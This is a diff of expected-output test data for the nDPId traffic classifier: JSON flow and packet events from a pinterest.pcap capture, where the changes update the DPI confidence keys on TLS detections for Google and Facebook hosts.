00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="} 
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 